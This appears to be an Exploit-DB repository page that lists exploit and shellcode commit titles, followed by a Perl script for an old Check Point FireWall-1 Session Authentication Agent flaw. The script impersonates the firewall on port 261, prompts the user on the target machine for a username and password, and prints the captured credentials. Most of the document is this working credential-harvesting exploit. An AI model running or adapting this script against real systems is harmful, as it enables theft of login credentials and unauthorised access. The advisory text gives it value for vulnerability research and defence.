
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
77 lines
No EOL
2.9 KiB
Perl
Executable file
77 lines
No EOL
2.9 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/1661/info
|
|
|
|
A vulnerability exists in the "Session Agent" portion of Firewall-1, from Check Point. This vulnerability appears to affect all versions of the session agent prior to the one shipped in FW-1 4.1. The session agent listens on a Windows 9x or NT box for connections from the firewall, requesting user authentication for connections. This information is all transmitted in cleartext, and is unauthenticated. This means it can be sniffed. In addition, the agent accepts connections from any host. Any person who can connect to the session agent can impersonate the Firewall-1 module, and request username and password information. If supplied, this can result in the compromise of that username and password.
|
|
|
|
#!/usr/bin/perl -w
|
|
#
|
|
# This script connects to a FireWall-1 Session Authentication Agent
|
|
# running on Windows 95/NT. It attempts to "authenticate" the remote
|
|
# user and returns the resulting username/password.
|
|
#
|
|
# The agent supports configuration of up to three IP addresses which
|
|
# are allowed to submit authentication requests. If there are three
|
|
# addresses configured, the user is presented with the following when
|
|
# an unknown host connects:
|
|
#
|
|
# "Authentication request from this IP Address is not allowed."
|
|
# [ OK ]
|
|
#
|
|
# If there are only one or two addresses allowed, the user gets this
|
|
# nice little dialog box:
|
|
#
|
|
# "Do you want to enter this IP to the Firewall-1 list"
|
|
# [ YES ] (default) [ NO ]
|
|
#
|
|
# Guess which button your typical user will click on?
|
|
#
|
|
# If the agent closes the connection prematurely, you will get strange
|
|
# results.
|
|
#
|
|
# tested vs. FW-1 Authentication Agent 1.1
|
|
#
|
|
# Andrew Danforth <acd@weirdness.net>
|
|
|
|
require 5.000;
|
|
|
|
use Socket;
|
|
use Getopt::Std;
|
|
|
|
$| = 1;
|
|
|
|
$FIREWALL_NAME = "Corporate Firewall";
|
|
$PASSWORD_PROMPT = "FireWall-1 password";
|
|
$PORT = 261;
|
|
|
|
die unless getopts('n:p:');
|
|
|
|
unless ($TARGET_IP = shift) {
|
|
print "usage: $0 [-n firewall_name] [-p password_prompt] target_ip\n";
|
|
exit(1);
|
|
}
|
|
|
|
$FIREWALL_NAME = $opt_n if (defined $opt_n);
|
|
$PASSWORD_PROMPT = $opt_p if (defined $opt_p);
|
|
|
|
socket(SOCK, AF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "socket: $!";
|
|
connect(SOCK, sockaddr_in($PORT, inet_aton($TARGET_IP))) || die "connect: $!";
|
|
|
|
select(SOCK); $| = 1; select(STDOUT);
|
|
|
|
print SOCK "220 FW-1 Session Authentication Request from $FIREWALL_NAME\n\r";
|
|
print "sent greeting\n";
|
|
print SOCK "331 User:\n\r";
|
|
print "sent user request\n";
|
|
$username = &get_response;
|
|
print "username entered: $username\n";
|
|
print SOCK "331 *$PASSWORD_PROMPT:\n\r";
|
|
$password = &get_response;
|
|
print "password entered: $password\n";
|
|
print SOCK "200 User $username authenticated by FireWall-1 authentication.\n\r";
|
|
print SOCK "230 OK\n\r";
|
|
|
|
sub get_response {
|
|
# this is ugly but it works. the session agent doesn't seem to send proper newlines.
|
|
my $input;
|
|
$input .= $key while($key = getc SOCK and ord($key));
|
|
return $input;
|
|
} |